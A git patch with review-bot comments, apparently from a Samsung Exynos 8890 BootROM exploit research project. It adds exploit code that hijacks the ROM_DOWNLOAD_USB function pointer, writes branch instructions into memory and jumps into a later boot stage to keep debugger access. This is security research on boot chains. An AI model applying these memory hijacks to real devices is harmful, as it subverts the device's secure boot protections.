From 201e8485e86594cb9ad5b1ac24fa4b4c9c64af19 Mon Sep 17 00:00:00 2001
From: Jonathan Herrewijnen
Date: Mon, 16 Sep 2024 10:52:44 +0200
Subject: [PATCH] Minor docs update and exploit.py update
---
 .../BootROM_8890/03_exploit_boot_chain.rst | 2 ++
 source/exploit/exploit.py | 24 +++++++++++++++++--
 2 files changed, 24 insertions(+), 2 deletions(-)
diff --git a/documentation/source/BootROM_8890/03_exploit_boot_chain.rst b/documentation/source/BootROM_8890/03_exploit_boot_chain.rst
index 7803063..0dba7ee 100644
--- a/documentation/source/BootROM_8890/03_exploit_boot_chain.rst
+++ b/documentation/source/BootROM_8890/03_exploit_boot_chain.rst
@@ -154,8 +154,10 @@ We searched for quite some time for a space which was both writeable and executa
 Python part
 ^^^^^^^^^^^
+Python code to setup the debugger.
 .. code-block:: python
+    # Setup initial debugger
     self.setup_guppy_debugger()
     self.cd.arch_dbg.state.auto_sync = False
diff --git a/source/exploit/exploit.py b/source/exploit/exploit.py
index bfdf742..bb01ba5 100644
--- a/source/exploit/exploit.py
+++ b/source/exploit/exploit.py
@@ -774,8 +774,8 @@ class ExynosDevice():
         # Restore bootflow
         # self.cd.memwrite_region(0x020200dc, p32(hijacked_fun))
-        # Restore this to
-        self.cd.restore_stack_and_jump(hijacked_fun)
+        # Disable this to keep access to the debugger after senindg the next stage
+        # self.cd.restore_stack_and_jump(hijacked_fun)
         # ==== Stage 5 ====
         stage4 = open("../S7/g930f_latest/g930f_sboot.bin.4.bin", "rb").read()
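Review bot: Commenting out `self.cd.restore_stack_and_jump(hijacked_fun)` turns a behavioural choice into a toggled comment, and the new comment above it has a typo (`senindg` → `sending`); a reader of the file can no longer tell whether the bootflow restore is meant to be dead or just temporarily off. A keyword flag on the method or a module constant, e.g. `if restore_bootflow: self.cd.restore_stack_and_jump(hijacked_fun)`, would make both modes explicit and keep the restore path documented. With the call disabled, the `hijacked_fun` value presumably read earlier for this restore is no longer consumed on this path, which is worth stating in the comment. The enclosing method starts and ends outside the hunk.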
@@ -789,6 +789,26 @@ class ExynosDevice():
         # assert len(stage4) == stage4_len, "Invalid stage4 length"
         self.send_normal_stage(stage4)
+
+        # TRYOUT PATCHING BL33
+        # BL1 is loaded, now authenticate and patch it
+        auth_bl1(DEBUGGER_ADDR)
+        self.usb_write(b"FLSH") # Flush cache (Frederic does this..)
+
+        # Hijack ROM download function
+        hijacked_fun = u32(self.cd.memdump_region(0x020200dc, 4))
+        self.cd.memwrite_region(0x020200dc, p32(DEBUGGER_ADDR)) # hijack ROM_DOWNLOAD_USB for BL31
+        self.cd.memwrite_region(0x02021880, self.cd.arch_dbg.sc.branch_absolute(DEBUGGER_ADDR, branch_ins="br"))
+
+        # Jump into BL1 (sboot.bin.1.bin)
+        JUMP_BL33 = 0x8f000000
+        def jump_bl33(lr):
+            self.cd.arch_dbg.state.LR = lr
+            self.cd.restore_stack_and_jump(JUMP_BL33)
+
+        # And jump into BL1 to execute it
+        jump_bl33(DEBUGGER_ADDR)
+        time.sleep(2)
         pass
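Review bot: `hijacked_fun = u32(self.cd.memdump_region(0x020200dc, 4))` saves the value that the next line overwrites, but nothing in the hunk uses it, and the hunk at @@ -774 disables the only `restore_stack_and_jump(hijacked_fun)` call — either document that the read is kept for a later restore, e.g. `# saved so the original ROM_DOWNLOAD_USB pointer can be written back after debugging`, or drop the assignment. The comments `# Jump into BL1 (sboot.bin.1.bin)` and `# And jump into BL1 to execute it` disagree with the names `JUMP_BL33` / `jump_bl33` and the section header `# TRYOUT PATCHING BL33`, so the stage being entered is ambiguous and one side should be corrected. `jump_bl33` is a nested function called exactly once and could be two plain statements, `time.sleep(2)` is an unexplained magic delay that deserves a comment naming what it waits for, and the trailing `pass` is now dead code. `auth_bl1`, `DEBUGGER_ADDR`, `u32`, `p32` and `time` are not defined in the hunk; I assume they are module-level, but the hunk gives no way to confirm. The enclosing method starts outside the hunk.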